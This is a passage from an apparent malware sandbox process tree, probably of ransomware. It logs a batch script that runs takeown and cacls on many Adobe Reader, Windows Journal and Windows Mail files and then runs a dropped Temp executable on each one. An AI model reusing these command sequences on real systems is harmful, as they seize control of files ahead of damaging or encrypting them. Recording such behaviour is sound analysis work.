      CnRDNN7F.exe -accepteula "reviews_super.gif" -nobanner
      4⤵
      PID:1168
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1988
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif""
  2⤵
  PID:228
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif" /E /G Admin:F /C
    3⤵
    PID:1544
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif"
    3⤵
    PID:1140
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "server_ok.gif" -nobanner
    3⤵
    PID:776
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "server_ok.gif" -nobanner
      4⤵
      PID:1808
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2036
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif""
  2⤵
  PID:1200
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif" /E /G Admin:F /C
    3⤵
    PID:224
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif"
    3⤵
    - Modifies file permissions
    PID:384
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "turnOnNotificationInAcrobat.gif" -nobanner
    3⤵
    PID:208
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "turnOnNotificationInAcrobat.gif" -nobanner
      4⤵
      PID:1176
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:432
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files\Windows Journal\de-DE\NBMapTIP.dll.mui""
  2⤵
  PID:236
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\de-DE\NBMapTIP.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1044
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\de-DE\NBMapTIP.dll.mui"
    3⤵
    - Modifies file permissions
    PID:2028
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "NBMapTIP.dll.mui" -nobanner
    3⤵
    PID:1192
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "NBMapTIP.dll.mui" -nobanner
      4⤵
      PID:1248
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1636
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files\Windows Journal\en-US\PDIALOG.exe.mui""
  2⤵
  PID:512
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\en-US\PDIALOG.exe.mui" /E /G Admin:F /C
    3⤵
    PID:1796
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\en-US\PDIALOG.exe.mui"
    3⤵
    PID:1640
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "PDIALOG.exe.mui" -nobanner
    3⤵
    PID:1168
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "PDIALOG.exe.mui" -nobanner
      4⤵
      PID:1980
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1988
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf""
  2⤵
  PID:1596
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf" /E /G Admin:F /C
    3⤵
    PID:1544
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf"
    3⤵
    PID:748
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "CourierStd-BoldOblique.otf" -nobanner
    3⤵
    PID:1808
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "CourierStd-BoldOblique.otf" -nobanner
      4⤵
      PID:776
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2036
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files\Windows Journal\fr-FR\JNTFiltr.dll.mui""
  2⤵
  PID:1680
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\fr-FR\JNTFiltr.dll.mui" /E /G Admin:F /C
    3⤵
    PID:224
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\fr-FR\JNTFiltr.dll.mui"
    3⤵
    PID:1968
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "JNTFiltr.dll.mui" -nobanner
    3⤵
    PID:1672
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "JNTFiltr.dll.mui" -nobanner
      4⤵
      PID:1588
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:872
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der""
  2⤵
  PID:2044
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der" /E /G Admin:F /C
    3⤵
    PID:1704
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der"
    3⤵
    PID:1684
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "RTC.der" -nobanner
    3⤵
    PID:1248
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "RTC.der" -nobanner
      4⤵
      PID:1192
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1636
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf""
  2⤵
  PID:1404
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf" /E /G Admin:F /C
    3⤵
    PID:1796
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf"
    3⤵
    PID:1640
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "MyriadPro-BoldIt.otf" -nobanner
    3⤵
    PID:1804
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "MyriadPro-BoldIt.otf" -nobanner
      4⤵
      PID:364
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1656
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files\Windows Journal\it-IT\jnwdui.dll.mui""
  2⤵
  PID:788
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\it-IT\jnwdui.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1160
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\it-IT\jnwdui.dll.mui"
    3⤵
    PID:748
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "jnwdui.dll.mui" -nobanner
    3⤵
    PID:776
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "jnwdui.dll.mui" -nobanner
      4⤵
      PID:1808
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2036
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif""
  2⤵
  PID:1596
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif" /E /G Admin:F /C
    3⤵
    PID:384
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif"
    3⤵
    PID:1176
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "email_initiator.gif" -nobanner
    3⤵
    PID:1968
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "email_initiator.gif" -nobanner
      4⤵
      PID:1380
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1672
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files\Windows Journal\ja-JP\jnwmon.dll.mui""
  2⤵
  PID:872
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\ja-JP\jnwmon.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1896
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\ja-JP\jnwmon.dll.mui"
    3⤵
    PID:1248
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "jnwmon.dll.mui" -nobanner
    3⤵
    PID:652
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "jnwmon.dll.mui" -nobanner
      4⤵
      PID:1568
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1804
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB""
  2⤵
  PID:1084
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB" /E /G Admin:F /C
    3⤵
    PID:1544
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB"
    3⤵
    PID:1524
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "ZY______.PFB" -nobanner
    3⤵
    PID:272
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "ZY______.PFB" -nobanner
      4⤵
      PID:1808
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:916
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp""
  2⤵
  PID:1140
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp" /E /G Admin:F /C
    3⤵
    PID:224
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp"
    3⤵
    PID:2032
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "brt.hyp" -nobanner
    3⤵
    PID:208
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "brt.hyp" -nobanner
      4⤵
      PID:1380
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:736
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files\Windows Journal\Templates\Dotted_Line.jtp""
  2⤵
  PID:804
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\Templates\Dotted_Line.jtp" /E /G Admin:F /C
    3⤵
    PID:1384
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\Templates\Dotted_Line.jtp"
    3⤵
    PID:1636
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "Dotted_Line.jtp" -nobanner
    3⤵
    PID:1640
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "Dotted_Line.jtp" -nobanner
      4⤵
      PID:1568
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1656
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css""
  2⤵
  PID:228
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css" /E /G Admin:F /C
    3⤵
    PID:648
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css"
    3⤵
    PID:748
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "main.css" -nobanner
    3⤵
    PID:776
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "main.css" -nobanner
      4⤵
      PID:1808
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:592
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif""
  2⤵
  PID:1404
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif" /E /G Admin:F /C
    3⤵
    PID:216
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif"
    3⤵
    - Modifies file permissions
    PID:1176
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "review_email.gif" -nobanner
    3⤵
    PID:1968
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "review_email.gif" -nobanner
      4⤵
      PID:1380
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1672
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif""
  2⤵
  PID:956
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif" /E /G Admin:F /C
    3⤵
    PID:1896
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif"
    3⤵
    PID:1248
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "submission_history.gif" -nobanner
    3⤵
    PID:1636
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "submission_history.gif" -nobanner
      4⤵
      PID:2044
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1640
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files\Windows Journal\Templates\Shorthand.jtp""
  2⤵
  PID:1656
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\Templates\Shorthand.jtp" /E /G Admin:F /C
    3⤵
    PID:1600
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\Templates\Shorthand.jtp"
    3⤵
    - Modifies file permissions
    PID:648
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "Shorthand.jtp" -nobanner
    3⤵
    PID:272
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "Shorthand.jtp" -nobanner
      4⤵
      PID:1808
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:732
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif""
  2⤵
  PID:236
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif" /E /G Admin:F /C
    3⤵
    PID:224
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif"
    3⤵
    PID:2032
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "warning.gif" -nobanner
    3⤵
    PID:208
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "warning.gif" -nobanner
      4⤵
      PID:1380
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:736
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf""
  2⤵
  PID:2036
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf" /E /G Admin:F /C
    3⤵
    PID:1384
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf"
    3⤵
    PID:684
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "CourierStd.otf" -nobanner
    3⤵
    PID:1972
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "CourierStd.otf" -nobanner
      4⤵
      PID:2044
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:968
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf""
  2⤵
  PID:788
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf" /E /G Admin:F /C
    3⤵
    PID:1160
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf"
    3⤵
    PID:748
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "MyriadPro-Regular.otf" -nobanner
    3⤵
    PID:648
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "MyriadPro-Regular.otf" -nobanner
      4⤵
      PID:452
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:272
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx""
  2⤵
  PID:732
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx" /E /G Admin:F /C
    3⤵
    PID:872
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx"
    3⤵
    - Modifies file permissions
    PID:224
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "can32.clx" -nobanner
    3⤵
    PID:2032
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "can32.clx" -nobanner
      4⤵
      PID:432
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:208
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files\Windows Mail\fr-FR\msoeres.dll.mui""
  2⤵
  PID:736
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Mail\fr-FR\msoeres.dll.mui" /E /G Admin:F /C
    3⤵
    PID:728
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Mail\fr-FR\msoeres.dll.mui"
    3⤵
    PID:1384
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "msoeres.dll.mui" -nobanner
    3⤵
    PID:1636
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "msoeres.dll.mui" -nobanner
      4⤵
      PID:2044
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1640
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp""
  2⤵
  PID:1408
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp" /E /G Admin:F /C
    3⤵
    PID:1600
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp"
    3⤵
    PID:1524
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "SaslPrepProfile_norm_bidi.spp" -nobanner
    3⤵
    PID:232
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "SaslPrepProfile_norm_bidi.spp" -nobanner
      4⤵
      PID:452
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:916
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files\Windows Mail\WinMail.exe""
  2⤵
  PID:1388
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Mail\WinMail.exe" /E /G Admin:F /C
    3⤵
    PID:384
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Mail\WinMail.exe"
    3⤵
    PID:1176
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "WinMail.exe" -nobanner
    3⤵
    PID:1380
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "WinMail.exe" -nobanner
      4⤵
      PID:1968
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1672
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt""
  2⤵
  PID:732
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt" /E /G Admin:F /C
    3⤵
    PID:1896
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt"
    3⤵
    PID:1248
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "DisplayLanguageNames.en_CA.txt" -nobanner
    3⤵
    PID:1972
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "DisplayLanguageNames.en_CA.txt" -nobanner
      4⤵
      PID:2044
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:968
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx""
  2⤵
  PID:480
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx" /E /G Admin:F /C
    3⤵
    PID:1544
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx"
    3⤵
    - Modifies file permissions
    PID:748
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "brt32.clx" -nobanner
    3⤵
    PID:648
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "brt32.clx" -nobanner
      4⤵
      PID:452
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
